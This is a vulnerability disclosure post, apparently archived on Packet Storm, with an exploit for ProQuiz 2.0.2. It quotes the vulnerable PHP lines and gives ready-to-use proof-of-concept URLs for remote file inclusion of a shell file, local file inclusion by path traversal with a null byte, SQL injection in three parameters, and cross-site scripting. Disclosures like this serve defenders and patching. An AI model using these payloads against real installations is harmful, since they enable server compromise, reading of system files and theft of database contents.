what you don't know can hurt you

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection
Posted Aug 14, 2012
Authored by L0n3ly-H34rT

ProQuiz version 2.0.2 suffers from cross site scripting, local file inclusion, remote file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion
MD5 | 9160bec5d189bb0a8ae5b53b4b15f706

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

Change Mirror Download
####################################################
### Exploit Title: ProQuiz v2.0.2 - Multiple Vulnerabilities
### Date: 18/7/2012
### Author: L0n3ly-H34rT
### My Site: http://se3c.blogspot.com/
### Contact: l0n3ly_h34rt@hotmail.com
### Vendor Homepage: http://proquiz.softon.org/
### Software Link: http://code.google.com/p/proquiz/downloads/list
### Tested on: Linux/Windows
####################################################

1- Remote File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

* Note :

Must be allow_url_include=On

-----------------------------------------------------------------------

2- Local File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg

* Note :

Must be magic_quotes_gpc = Off

---------------------------------------------------------------------

3- Remote SQL Injection & Blind SQL Injection :

* In Two Files :

A- First ( answers.php ) in line 55 :

<?php echo $_GET['instid']; ?>

B- Second ( functions.php ) In :

$_POST['email']

$_POST['username']

* P.O.C :

A- First :

http://127.0.0.1/full/answers.php?action=answers&instid=[SQL]

B- Second :

About Email :

In URL:

http://127.0.0.1/full/functions.php?action=recoverpass

Inject Here In POST Method :

email=[SQL]

About Username :

In URL:

http://127.0.0.1/full/functions.php?action=edit_profile&type=username

Inject Here In POST Method :

username=[SQL]

-------------------------------------------------------------------------------------

4 - Cross Site Scripting :

e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------------------

# Greetz to my friendz

References:

http://se3c.blogspot.com/
http://code.google.com/p/proquiz/downloads/list

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close